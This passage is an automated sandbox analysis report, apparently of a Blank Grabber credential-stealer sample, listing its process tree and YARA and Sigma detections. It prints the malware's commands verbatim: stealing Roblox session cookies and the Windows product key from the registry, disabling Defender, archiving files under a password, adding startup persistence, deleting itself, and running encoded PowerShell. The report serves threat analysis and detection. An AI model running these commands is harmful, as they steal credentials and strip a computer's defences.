conhost.exe (PID: 3292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

attrib.exe (PID: 7500 cmdline: attrib -r C:\Windows\System32\drivers\etc\hosts MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)

cmd.exe (PID: 7584 cmdline: C:\Windows\system32\cmd.exe /c "getmac" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

getmac.exe (PID: 7688 cmdline: getmac MD5: 7D4B72DFF5B8E98DD1351A401E402C33)

cmd.exe (PID: 7596 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 5772 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 6692 cmdline: C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

attrib.exe (PID: 7812 cmdline: attrib +r C:\Windows\System32\drivers\etc\hosts MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)

cmd.exe (PID: 6420 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 7416 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 3228 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7412 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 8084 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 7344 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 7408 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 7228 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 7812 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 8040 cmdline: powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 5840 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 3524 cmdline: powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 7112 cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe a -r -hp"mined" "C:\Users\user\AppData\Local\Temp\rEC04.zip" *" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

rar.exe (PID: 8048 cmdline: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe a -r -hp"mined" "C:\Users\user\AppData\Local\Temp\rEC04.zip" * MD5: 9C223575AE5B9544BC3D69AC6364F75E)

cmd.exe (PID: 7816 cmdline: C:\Windows\system32\cmd.exe /c "wmic os get Caption" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 7784 cmdline: wmic os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 1776 cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 7368 cmdline: wmic computersystem get totalphysicalmemory MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 7924 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 7064 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 7348 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 5912 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 6112 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 7800 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 5340 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7276 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 2072 cmdline: C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\Resource.exe"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

PING.EXE (PID: 5552 cmdline: ping localhost -n 3 MD5: 2F46799D79D22AC72C241EC0322B011D)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\_MEI66322\rarreg.key	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000001.00000003.2030787005.0000020AB3901000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000000.00000003.2019140558.00000203A2F47000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000001.00000002.2473117545.0000020AB3C0B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000001.00000003.2030704997.0000020AB38CE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000001.00000002.2473004554.0000020AB39C0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000001.00000002.2473004554.0000020AB39C0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2019140558.00000203A2F49000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000001.00000003.2467713655.0000020AB46E4000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
Process Memory Space: Resource.exe PID: 6632	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
Process Memory Space: Resource.exe PID: 6048	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
Process Memory Space: Resource.exe PID: 6048	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Resource.exe PID: 6048	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 7 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Resource.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Resource.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Resource.exe", ParentImage: C:\Users\user\Desktop\Resource.exe, ParentProcessId: 6048, ParentProcessName: Resource.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Resource.exe'", ProcessId: 2360, ProcessName: cmd.exe

Sigma detected: Powershell Defender Disable Scan Feature

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Resource.exe", ParentImage: C:\Users\user\Desktop\Resource.exe, ParentProcessId: 6048, ParentProcessName: Resource.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ProcessId: 3936, ProcessName: cmd.exe

Sigma detected: Rar Usage with Password and Compression Level

Source: Process started

Author: @ROxPinTeddy: Data: Command: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe a -r -hp"mined" "C:\Users\user\AppData\Local\Temp\rEC04.zip" *", CommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe a -r -hp"mined" "C:\Users\user\AppData\Local\Temp\rEC04.zip" *", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Resource.exe", ParentImage: C:\Users\user\Desktop\Resource.exe, ParentProcessId: 6048, ParentProcessName: Resource.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe a -r -hp"mined" "C:\Users\user\AppData\Local\Temp\rEC04.zip" *", ProcessId: 7112, ProcessName: cmd.exe

Sigma detected: Rare Remote Thread Creation By Uncommon Source Image

Source: Threat created

Author: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\System32\wbem\WMIC.exe, SourceProcessId: 7368, StartAddress: C76632B0, TargetImage: C:\Windows\System32\wbem\WMIC.exe, TargetProcessId: 7368

Sigma detected: Suspicious Encoded PowerShell Command Line

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM

Sigma detected: Suspicious Ping/Del Command Combination

Source: Process started

Author: Ilya Krestinichev: Data: Command: C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\Resource.exe"", CommandLine: C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\Resource.exe"", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Resource.exe", ParentImage: C:\Users\user\Desktop\Resource.exe, ParentProcessId: 6048, ParentProcessName: Resource.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\Resource.exe"", ProcessId: 2072, ProcessName: cmd.exe

Sigma detected: Suspicious PowerShell Encoded Command Patterns

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM

Sigma detected: Suspicious Startup Folder Persistence

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\Resource.exe, ProcessId: 6048, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ? .scr

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAc